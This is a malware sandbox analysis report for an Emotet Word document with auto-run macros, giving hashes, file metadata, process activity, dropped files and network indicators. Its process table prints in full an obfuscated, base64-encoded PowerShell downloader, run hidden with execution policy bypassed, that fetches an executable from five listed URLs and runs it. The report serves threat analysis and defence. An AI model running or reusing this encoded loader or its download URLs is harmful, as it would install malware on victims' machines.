analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

D0F9B9C4AD0CF5286A15F850C5B982FDDA98CB81.doc

Full analysis: https://app.any.run/tasks/42b8ed64-1824-4784-8850-33b57ca651f1
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 10:46:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: card deliverables Credit Card Account, Subject: Circle, Author: Hayden Stamm, Comments: navigating, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 07:20:00 2019, Last Saved Time/Date: Mon May 20 07:20:00 2019, Number of Pages: 1, Number of Words: 11, Number of Characters: 63, Security: 0
MD5:

0C47C3095BCA3B5C58116579072386A3

SHA1:

D0F9B9C4AD0CF5286A15F850C5B982FDDA98CB81

SHA256:

2A467716313A55305130586D623247BE7BA78A2BC75CB074DBB2C8DA4C38678E

SSDEEP:

3072:d77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qGaXX5uj10W:d77HUUUUUUUUUUUUUUUUUUUT52VJaXX4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3516)
    • Creates files in the user directory

      • powershell.exe (PID: 3516)
    • PowerShell script executed

      • powershell.exe (PID: 3516)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2948)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: card deliverables Credit Card Account
Subject: Circle
Author: Hayden Stamm
Keywords: -
Comments: navigating
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 06:20:00
ModifyDate: 2019:05:20 06:20:00
Pages: 1
Words: 11
Characters: 63
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Ankunding LLC
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 73
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Ruecker
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\D0F9B9C4AD0CF5286A15F850C5B982FDDA98CB81.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3516powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABSAF8ANwA4ADMAMgAwAD0AJwBJADgAMwA0ADQAMAAnADsAJABHADIAMQAyAF8AMQAzADgAIAA9ACAAJwA4ADgAMQAnADsAJABDADAAMAA3ADMANgA0AD0AJwB1ADQAXwA4ADQAOQBfACcAOwAkAEUANwAyAF8ANAA0ADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEcAMgAxADIAXwAxADMAOAArACcALgBlAHgAZQAnADsAJABZAF8AXwA5ADYANQAzADgAPQAnAHAAOAAzADIANwA5ADgANAAnADsAJABLADEAOAAyADgANgA9ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBlAFQALgBgAHcAZQBCAGMAbABgAEkAYABlAE4AVAA7ACQAQQA3AF8AMgAyAF8AMQAyAD0AJwBoAHQAdABwADoALwAvAHQAZQBuAGEAbgB0AHMAYwByAGUAZQBuAGkAbgBnAGEAcwBpAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHoAcABqAGQAdgB5ADEANwAvAEAAaAB0AHQAcAA6AC8ALwBiAHkAcwB0AGUAawBzAHQAaQBsAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB6AG0ANgA0ADgAMQAvAEAAaAB0AHQAcAA6AC8ALwBlAHIAaQBjAC0AbQBhAG4AZABhAGwAYQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAagA2ADgANwAyADQAOAAxADIALwBAAGgAdAB0AHAAOgAvAC8AYQB2AGkAdAByAG8AbgBzAC4AYwBvAG0ALwB1AG0AYQAtAHMAaQB0AGUALwBpAHMAaQAyAC8AQABoAHQAdABwADoALwAvAGQAZQB2AGUAbABvAHAAaQBuAGcALgBzAG8AdQBsAGIAcgBpAGcAaAB0AHMALgBjAG8AbQAvAHcAcAAvAHMANAA0ADUALwAnAC4AUwBQAEwASQBUACgAJwBAACcAKQA7ACQAawAyADQAOAA3AF8AOAAzAD0AJwBYADUANgAyADUANgA2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABmADEANABfADAAMQBfADQAIABpAG4AIAAkAEEANwBfADIAMgBfADEAMgApAHsAdAByAHkAewAkAEsAMQA4ADIAOAA2AC4ARABvAFcAbgBMAE8AYQBEAGYASQBMAEUAKAAkAGYAMQA0AF8AMAAxAF8ANAAsACAAJABFADcAMgBfADQANAA1ACkAOwAkAFUANQA3ADUANQA5ADAAPQAnAFcAXwA4ADUANAAyACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQARQA3ADIAXwA0ADQANQApAC4ATABlAG4AZwBUAEgAIAAtAGcAZQAgADMAOQA3ADMAMQApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtACcAKwAnAEkAdABlAG0AJwApACAAJABFADcAMgBfADQANAA1ADsAJABPADMANgA5AF8AMwA4AD0AJwBKADEAOAAxADMANQAxACcAOwBiAHIAZQBhAGsAOwAkAEYAOABfADAAOQA0AD0AJwBaADgAMQAyADUAMwAxAF8AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcgA3ADUANQA5ADAAPQAnAGYANQA1ADgAMwA1ADIAOQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
1 338
Read events
874
Write events
459
Delete events
5

Modification events

(PID) Process:(2948) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:s!=
Value:
73213D00840B0000010000000000000000000000
(PID) Process:(2948) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2948) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2948) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1320419358
(PID) Process:(2948) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1320419472
(PID) Process:(2948) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1320419473
(PID) Process:(2948) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
840B0000AEB31F45F90ED50100000000
(PID) Process:(2948) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:y#=
Value:
79233D00840B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2948) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:y#=
Value:
79233D00840B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2948) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDD3.tmp.cvr
MD5:
SHA256:
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6EQNMZRCFCILAN5W5FYA.temp
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:AAE1F34939203117AC1F4B1DA330748D
SHA256:A8522EFD13191ED100712611DBB7B818993A3A9AEE4584A1360605C4D2C4BD74
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$F9B9C4AD0CF5286A15F850C5B982FDDA98CB81.docpgc
MD5:9C4109A84631CC156978C44041DD4EEC
SHA256:BEDD0F9E05318F1929B65E19A7C7E8EC7B8134525109DFF3602187FFA67085F9
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0887AE9.wmfwmf
MD5:A1759BDA71C3FE0B899A08B657C2643E
SHA256:13AD1498E24AE8D7E6FCE1B4FA1DD9855E865891B48CD56775EC3F351565A6C1
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\685645DF.wmfwmf
MD5:BE821216F0F5D750EEDC2DD731AB8104
SHA256:4F42EDBCAF8BC035D903D35AE0B34A5BC4D6D23B8595B29C8AE5281E25117AB1
3516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF121b7f.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:CDDED189C0D32E9EFC2E7D1DE7F2363B
SHA256:DCDA0E839881BFED79FFCB93BE35908450D82E3E95DC4948C920059EC64BAF41
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7EFF6654.wmfwmf
MD5:2AFCBAE60E01F01D8566F1023112E250
SHA256:009819A0D54057A244C0DACEDACDCC2E87741E47C997C0638B0BB1807A87C8FD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3516
powershell.exe
GET
404
91.216.107.155:80
http://eric-mandala.com/wp-content/fj68724812/
FR
xml
345 b
malicious
3516
powershell.exe
GET
404
195.154.162.233:80
http://bystekstil.com/wp-admin/zm6481/
FR
xml
345 b
suspicious
3516
powershell.exe
GET
404
202.71.110.22:80
http://tenantscreeningasia.com/wp-admin/zpjdvy17/
MY
xml
345 b
suspicious
3516
powershell.exe
GET
404
108.179.217.238:80
http://avitrons.com/uma-site/isi2/
US
xml
345 b
unknown
3516
powershell.exe
GET
404
78.24.184.133:80
http://developing.soulbrights.com/wp/s445/
HU
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3516
powershell.exe
195.154.162.233:80
bystekstil.com
Online S.a.s.
FR
suspicious
3516
powershell.exe
108.179.217.238:80
avitrons.com
CyrusOne LLC
US
unknown
3516
powershell.exe
91.216.107.155:80
eric-mandala.com
ADISTA SAS
FR
malicious
3516
powershell.exe
202.71.110.22:80
tenantscreeningasia.com
TM-VADS DC Hosting
MY
suspicious
3516
powershell.exe
78.24.184.133:80
developing.soulbrights.com
ATW Internet Kft.
HU
suspicious

DNS requests

Domain
IP
Reputation
tenantscreeningasia.com
  • 202.71.110.22
suspicious
bystekstil.com
  • 195.154.162.233
suspicious
eric-mandala.com
  • 91.216.107.155
malicious
avitrons.com
  • 108.179.217.238
unknown
developing.soulbrights.com
  • 78.24.184.133
unknown

Threats

No threats detected
No debug info